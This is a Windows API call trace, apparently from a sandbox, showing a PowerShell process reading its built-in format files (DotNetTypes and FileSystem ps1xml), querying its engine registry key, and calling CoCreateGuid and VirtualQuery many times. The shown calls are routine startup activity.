	[0341.205] VirtualQuery (in: lpAddress=0x1ab350, lpBuffer=0x1ac210, dwLength=0x30 | out: lpBuffer=0x1ac210*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.205] VirtualQuery (in: lpAddress=0x1ab350, lpBuffer=0x1ac210, dwLength=0x30 | out: lpBuffer=0x1ac210*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.205] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xe6e9d0b4, Data2=0xf80a, Data3=0x4042, Data4=([0]=0x9b, [1]=0x23, [2]=0xe6, [3]=0x83, [4]=0xd0, [5]=0x4a, [6]=0xfa, [7]=0x99))) returned 0x0
	[0341.205] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x92903ca5, Data2=0xdd4a, Data3=0x4479, Data4=([0]=0xab, [1]=0x60, [2]=0x9f, [3]=0x88, [4]=0x11, [5]=0xb0, [6]=0x7e, [7]=0x67))) returned 0x0
	[0341.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0341.206] SetErrorMode (uMode=0x1) returned 0x1
	[0341.206] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0341.206] GetFileType (hFile=0x2ec) returned 0x1
	[0341.206] SetErrorMode (uMode=0x1) returned 0x1
	[0341.206] GetFileType (hFile=0x2ec) returned 0x1
	[0341.206] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.207] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.208] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.208] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.209] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.209] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.209] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.209] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.210] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.210] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.210] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.211] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.211] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.211] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.211] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.211] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.213] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0341.213] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0xbce, lpOverlapped=0x0) returned 1
	[0341.213] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f302e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f302e*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0341.213] ReadFile (in: hFile=0x2ec, lpBuffer=0x34f38f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x34f38f8*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0341.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0341.213] SetErrorMode (uMode=0x1) returned 0x1
	[0341.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0341.214] SetErrorMode (uMode=0x1) returned 0x1
	[0341.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0341.214] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2ec) returned 0x0
	[0341.214] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0341.214] CoTaskMemAlloc (cb=0x5a) returned 0x1b8147b0
	[0341.214] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b8147b0, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0341.214] CoTaskMemFree (pv=0x1b8147b0) 
	[0341.214] RegCloseKey (hKey=0x2ec) returned 0x0
	[0341.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0341.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0342.378] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6836acc3, Data2=0xdf0f, Data3=0x4bf6, Data4=([0]=0xa4, [1]=0x9d, [2]=0xb5, [3]=0xd6, [4]=0x30, [5]=0xbf, [6]=0x34, [7]=0xd0))) returned 0x0
	[0342.378] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xc8f94fbf, Data2=0x92f8, Data3=0x4efc, Data4=([0]=0x8d, [1]=0xfe, [2]=0x32, [3]=0x21, [4]=0x4f, [5]=0x8f, [6]=0x7, [7]=0xd1))) returned 0x0
	[0342.379] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf5eef7e8, Data2=0x1780, Data3=0x486f, Data4=([0]=0xad, [1]=0x18, [2]=0xe6, [3]=0x9d, [4]=0x38, [5]=0x68, [6]=0xe7, [7]=0x78))) returned 0x0
	[0342.379] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x89295585, Data2=0x5b8a, Data3=0x438a, Data4=([0]=0x91, [1]=0x80, [2]=0x85, [3]=0x3, [4]=0x87, [5]=0xd2, [6]=0x85, [7]=0x93))) returned 0x0
	[0342.379] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9cfe80b8, Data2=0x7bc6, Data3=0x4e84, Data4=([0]=0x86, [1]=0xcc, [2]=0xdd, [3]=0xb7, [4]=0x2e, [5]=0x4f, [6]=0x5c, [7]=0x1f))) returned 0x0
	[0342.379] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x4d6ee49b, Data2=0xe571, Data3=0x4671, Data4=([0]=0xb4, [1]=0x75, [2]=0x63, [3]=0x21, [4]=0x29, [5]=0xbd, [6]=0x7e, [7]=0x6f))) returned 0x0
	[0342.379] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.379] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x37cbc03, Data2=0xf253, Data3=0x4f27, Data4=([0]=0x82, [1]=0xdb, [2]=0x60, [3]=0x7b, [4]=0x23, [5]=0xa0, [6]=0xbf, [7]=0xea))) returned 0x0
	[0342.380] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.380] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.380] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x1780aead, Data2=0xc1eb, Data3=0x4e50, Data4=([0]=0xa0, [1]=0xee, [2]=0x38, [3]=0x15, [4]=0xbb, [5]=0xa6, [6]=0xb8, [7]=0xbf))) returned 0x0
	[0342.380] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6e7e5790, Data2=0xbf9f, Data3=0x48f1, Data4=([0]=0x85, [1]=0xbc, [2]=0x79, [3]=0x13, [4]=0x5d, [5]=0xbb, [6]=0x4, [7]=0x3f))) returned 0x0
	[0342.380] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x35d4ca77, Data2=0xa58e, Data3=0x4060, Data4=([0]=0x80, [1]=0xc9, [2]=0xcf, [3]=0x35, [4]=0xff, [5]=0xf8, [6]=0x5e, [7]=0xcc))) returned 0x0
	[0342.380] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xd90124f1, Data2=0xd14f, Data3=0x4519, Data4=([0]=0xa7, [1]=0xf, [2]=0x91, [3]=0xf6, [4]=0xc0, [5]=0x5d, [6]=0x8d, [7]=0xb4))) returned 0x0
	[0342.380] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.381] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xbb2b3307, Data2=0xf199, Data3=0x4993, Data4=([0]=0xb9, [1]=0x21, [2]=0xd, [3]=0x15, [4]=0xad, [5]=0xb2, [6]=0x75, [7]=0xdd))) returned 0x0
	[0342.381] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.381] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.381] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.381] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.381] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.381] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3ad4ce07, Data2=0x27dd, Data3=0x46e5, Data4=([0]=0xa2, [1]=0xe, [2]=0x59, [3]=0x56, [4]=0xca, [5]=0x2b, [6]=0xe3, [7]=0x4d))) returned 0x0
	[0342.381] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xae2d5ca5, Data2=0x99db, Data3=0x4407, Data4=([0]=0xbb, [1]=0xe5, [2]=0x90, [3]=0xee, [4]=0xb2, [5]=0x3c, [6]=0x7f, [7]=0xfc))) returned 0x0
	[0342.382] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x1ab55a18, Data2=0x9d3e, Data3=0x4c51, Data4=([0]=0xb7, [1]=0x72, [2]=0x3e, [3]=0xc0, [4]=0x66, [5]=0x1a, [6]=0x86, [7]=0xaf))) returned 0x0
	[0342.382] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xd7d14e2b, Data2=0xf27e, Data3=0x4afe, Data4=([0]=0x81, [1]=0x9f, [2]=0x76, [3]=0x8d, [4]=0xcd, [5]=0x97, [6]=0x6b, [7]=0xb))) returned 0x0
	[0342.382] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xfffce6e6, Data2=0xf19b, Data3=0x4647, Data4=([0]=0xaf, [1]=0x83, [2]=0x48, [3]=0x87, [4]=0x94, [5]=0x33, [6]=0x4d, [7]=0xfe))) returned 0x0
	[0342.382] VirtualQuery (in: lpAddress=0x1abce0, lpBuffer=0x1acba0, dwLength=0x30 | out: lpBuffer=0x1acba0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.382] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xa89c12b1, Data2=0x620c, Data3=0x460c, Data4=([0]=0xb7, [1]=0x90, [2]=0x98, [3]=0x86, [4]=0x90, [5]=0xbd, [6]=0x30, [7]=0x81))) returned 0x0
	[0342.382] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x541ff7fb, Data2=0xe2dc, Data3=0x4f59, Data4=([0]=0x85, [1]=0x2f, [2]=0xac, [3]=0x70, [4]=0x98, [5]=0xae, [6]=0xf1, [7]=0xea))) returned 0x0
	[0342.383] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x8c912216, Data2=0x82e8, Data3=0x4f8e, Data4=([0]=0xad, [1]=0x42, [2]=0x73, [3]=0x61, [4]=0xfd, [5]=0x91, [6]=0x4a, [7]=0x95))) returned 0x0
	[0342.383] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xabf56b1a, Data2=0x5abd, Data3=0x4ca5, Data4=([0]=0x85, [1]=0xd8, [2]=0x13, [3]=0x73, [4]=0x0, [5]=0xb6, [6]=0xef, [7]=0xe))) returned 0x0
	[0342.383] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xfba39ce, Data2=0xcdbc, Data3=0x4707, Data4=([0]=0x82, [1]=0xa0, [2]=0x67, [3]=0x77, [4]=0xac, [5]=0xb5, [6]=0xc6, [7]=0x6d))) returned 0x0
	[0342.383] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xbfa1d31d, Data2=0x4bfd, Data3=0x4034, Data4=([0]=0xbc, [1]=0xe4, [2]=0x65, [3]=0x59, [4]=0xf0, [5]=0xda, [6]=0xb5, [7]=0xa3))) returned 0x0
	[0342.383] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x8690b550, Data2=0xe8e4, Data3=0x46c1, Data4=([0]=0xbc, [1]=0x71, [2]=0xe8, [3]=0x5c, [4]=0x53, [5]=0x6c, [6]=0x29, [7]=0xb0))) returned 0x0
	[0342.383] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x54171b6f, Data2=0x26ce, Data3=0x4130, Data4=([0]=0xa4, [1]=0xa, [2]=0xec, [3]=0x96, [4]=0x45, [5]=0xc8, [6]=0x96, [7]=0x20))) returned 0x0
	[0342.384] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9ba1f17b, Data2=0x7c55, Data3=0x4ae7, Data4=([0]=0xb2, [1]=0x99, [2]=0x2f, [3]=0xda, [4]=0x9d, [5]=0x8d, [6]=0xd8, [7]=0x96))) returned 0x0
	[0342.384] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x1a88fb5b, Data2=0x67d6, Data3=0x4714, Data4=([0]=0x90, [1]=0x33, [2]=0x8a, [3]=0x3d, [4]=0x83, [5]=0xa7, [6]=0x8c, [7]=0x7d))) returned 0x0
	[0342.384] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf3302a3e, Data2=0x20f, Data3=0x4469, Data4=([0]=0xa9, [1]=0xb7, [2]=0xd2, [3]=0x57, [4]=0x1c, [5]=0xee, [6]=0xfd, [7]=0x19))) returned 0x0
	[0342.384] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xe3bad181, Data2=0x3170, Data3=0x403b, Data4=([0]=0xbb, [1]=0xaf, [2]=0x62, [3]=0xa4, [4]=0x74, [5]=0xf9, [6]=0x5c, [7]=0x71))) returned 0x0
	[0342.384] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf36cc7b, Data2=0xa8b5, Data3=0x4403, Data4=([0]=0xbe, [1]=0x34, [2]=0xd1, [3]=0x5c, [4]=0x84, [5]=0x88, [6]=0x62, [7]=0x48))) returned 0x0
	[0342.384] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xc2a5c35d, Data2=0xedb1, Data3=0x47da, Data4=([0]=0x81, [1]=0xc9, [2]=0xe0, [3]=0x9d, [4]=0xb0, [5]=0xb4, [6]=0x60, [7]=0x4a))) returned 0x0
	[0342.385] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x1497bedb, Data2=0x14c4, Data3=0x408f, Data4=([0]=0xbd, [1]=0x2a, [2]=0x77, [3]=0x5c, [4]=0xee, [5]=0xf1, [6]=0xb4, [7]=0xd3))) returned 0x0
	[0342.385] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xc7a6e940, Data2=0xe0d0, Data3=0x4cba, Data4=([0]=0xa0, [1]=0xb7, [2]=0x71, [3]=0x53, [4]=0xa4, [5]=0x94, [6]=0x85, [7]=0x3f))) returned 0x0
	[0342.385] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xb70d3982, Data2=0x4e0d, Data3=0x49f7, Data4=([0]=0xb6, [1]=0xbe, [2]=0xcb, [3]=0xb8, [4]=0x3a, [5]=0x5, [6]=0xc4, [7]=0x1b))) returned 0x0
	[0342.385] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9f02be3a, Data2=0xc58a, Data3=0x4625, Data4=([0]=0xbd, [1]=0x6c, [2]=0xe9, [3]=0xca, [4]=0x22, [5]=0x48, [6]=0x9e, [7]=0x45))) returned 0x0
	[0342.385] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xb7e6828b, Data2=0xfaa, Data3=0x46e1, Data4=([0]=0x8f, [1]=0xf7, [2]=0x34, [3]=0xe0, [4]=0xfa, [5]=0x3f, [6]=0xff, [7]=0xab))) returned 0x0
	[0342.385] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.386] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.386] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0342.386] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9a964d45, Data2=0xefac, Data3=0x4cb2, Data4=([0]=0xb3, [1]=0x2c, [2]=0x8f, [3]=0x3b, [4]=0xfb, [5]=0x65, [6]=0xcf, [7]=0x94))) returned 0x0
	[0342.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0342.386] SetErrorMode (uMode=0x1) returned 0x1
	[0342.387] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d0
	[0342.387] GetFileType (hFile=0x2d0) returned 0x1
	[0342.387] SetErrorMode (uMode=0x1) returned 0x1
	[0342.387] GetFileType (hFile=0x2d0) returned 0x1
	[0342.387] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.388] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
